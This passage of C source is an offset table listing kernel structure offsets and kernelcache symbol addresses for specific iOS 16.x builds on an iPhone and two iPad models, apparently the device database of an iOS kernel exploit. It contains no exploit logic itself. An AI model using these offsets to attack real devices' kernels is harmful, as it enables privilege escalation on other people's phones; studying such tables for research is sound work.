._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a32d190, .kernelcache__gPhysBase = 0xfffffff0078540c0, .kernelcache__gPhysSize = 0xfffffff0078540c0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0078522a0, .kernelcache__perfmon_devices = 0xfffffff00a368390, .kernelcache__perfmon_dev_open = 0xfffffff007ecce10, .kernelcache__ptov_table = 0xfffffff007807410, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a367800, .kernelcache__vm_pages = 0xfffffff0078040d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078063d0, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3677f8, .kernelcache__vn_kqfilter = 0xfffffff007f1ce28, }, // iOS 16.3.1 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:01 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8120", .build_version = "20D67", .device_id = "iPhone15,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a32d190, .kernelcache__gPhysBase = 0xfffffff0078540c0, .kernelcache__gPhysSize = 0xfffffff0078540c0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0078522a0, .kernelcache__perfmon_devices = 0xfffffff00a368390, .kernelcache__perfmon_dev_open = 0xfffffff007ecce10, .kernelcache__ptov_table = 0xfffffff007807410, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a367800, .kernelcache__vm_pages = 0xfffffff0078040d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078063d0, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3677f8, .kernelcache__vn_kqfilter = 0xfffffff007f1ce28, }, // iOS 16.4 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:19 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8120", .build_version = "20E247", .device_id = "iPhone15,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a411208, .kernelcache__gPhysBase = 0xfffffff007933ed0, .kernelcache__gPhysSize = 0xfffffff007933ed0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0079320a8, .kernelcache__perfmon_devices = 0xfffffff00a44f500, .kernelcache__perfmon_dev_open = 0xfffffff007eecd3c, .kernelcache__ptov_table = 0xfffffff0078e7178, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a44e990, .kernelcache__vm_pages = 0xfffffff0078e3eb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e6128, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a44e988, .kernelcache__vn_kqfilter = 0xfffffff007f3960c, }, // iOS 16.4.1 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:19 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8120", .build_version = "20E252", .device_id = "iPhone15,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a411208, .kernelcache__gPhysBase = 0xfffffff007933ed0, .kernelcache__gPhysSize = 0xfffffff007933ed0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0079320a8, .kernelcache__perfmon_devices = 0xfffffff00a44f500, .kernelcache__perfmon_dev_open = 0xfffffff007eecd3c, .kernelcache__ptov_table = 0xfffffff0078e7178, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a44e990, .kernelcache__vm_pages = 0xfffffff0078e3eb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e6128, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a44e988, .kernelcache__vn_kqfilter = 0xfffffff007f3960c, }, // iOS 16.5 // { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:09:28 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8120", .build_version = "20F66", .device_id = "iPhone15,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a419208, .kernelcache__gPhysBase = 0xfffffff007934010, .kernelcache__gPhysSize = 0xfffffff007934010 + 0x8, .kernelcache__gVirtBase = 0xfffffff0079321e8, .kernelcache__perfmon_devices = 0xfffffff00a457500, .kernelcache__perfmon_dev_open = 0xfffffff007eecfc0, .kernelcache__ptov_table = 0xfffffff0078e7178, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a456990, .kernelcache__vm_pages = 0xfffffff0078e3eb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e6128, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a456988, .kernelcache__vn_kqfilter = 0xfffffff007f39b28, }, // iOS 16.6 Beta 1 // { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:35 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8120", .build_version = "20G5026e", .device_id = "iPhone15,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a4c9a30, .kernelcache__gPhysBase = 0xfffffff00794c1b8, .kernelcache__gPhysSize = 0xfffffff00794c1b8 + 0x8, .kernelcache__gVirtBase = 0xfffffff00794a370, .kernelcache__perfmon_devices = 0xfffffff00a509530, .kernelcache__perfmon_dev_open = 0xfffffff007f116dc, .kernelcache__ptov_table = 0xfffffff0078ff9b8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a508910, .kernelcache__vm_pages = 0xfffffff0078fc108, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078fe968, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a508908, .kernelcache__vn_kqfilter = 0xfffffff007f5dbf8, }, // End iPhone 14 Pro Max // // End iPhone 14 Pro, iPhone 14 Pro Max series // // iPad Section // // iPad 9th Gen // // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:25 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8030", .build_version = "20E246", .device_id = "iPad12,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a361208, .kernelcache__gPhysBase = 0xfffffff007927ed0, .kernelcache__gPhysSize = 0xfffffff007927ed0 + 8, .kernelcache__gVirtBase = 0xfffffff0079260a8, .kernelcache__perfmon_devices = 0xfffffff00a39f4f0, .kernelcache__perfmon_dev_open = 0xfffffff007ed73c8, .kernelcache__ptov_table = 0xfffffff0078db178, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a39e990, .kernelcache__vm_pages = 0xfffffff0078d7eb0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078da118, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a39e988, .kernelcache__vn_kqfilter = 0xfffffff007f25f7c, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:25 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8030", .build_version = "20E252", .device_id = "iPad12,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a361208, .kernelcache__gPhysBase = 0xfffffff007927ed0, .kernelcache__gPhysSize = 0xfffffff007927ed0 + 8, .kernelcache__gVirtBase = 0xfffffff0079260a8, .kernelcache__perfmon_devices = 0xfffffff00a39f4f0, .kernelcache__perfmon_dev_open = 0xfffffff007ed73c8, .kernelcache__ptov_table = 0xfffffff0078db178, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a39e990, .kernelcache__vm_pages = 0xfffffff0078d7eb0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078da118, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a39e988, .kernelcache__vn_kqfilter = 0xfffffff007f25f7c, }, // iPad 9th Gen Cellular // // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:25 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8030", .build_version = "20E246", .device_id = "iPad12,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a361208, .kernelcache__gPhysBase = 0xfffffff007927ed0, .kernelcache__gPhysSize = 0xfffffff007927ed0 + 8, .kernelcache__gVirtBase = 0xfffffff0079260a8, .kernelcache__perfmon_devices = 0xfffffff00a39f4f0, .kernelcache__perfmon_dev_open = 0xfffffff007ed73c8, .kernelcache__ptov_table = 0xfffffff0078db178, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a39e990, .kernelcache__vm_pages = 0xfffffff0078d7eb0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078da118, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a39e988, .kernelcache__vn_kqfilter = 0xfffffff007f25f7c, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:25 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8030", .build_version = "20E252", .device_id = "iPad12,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, 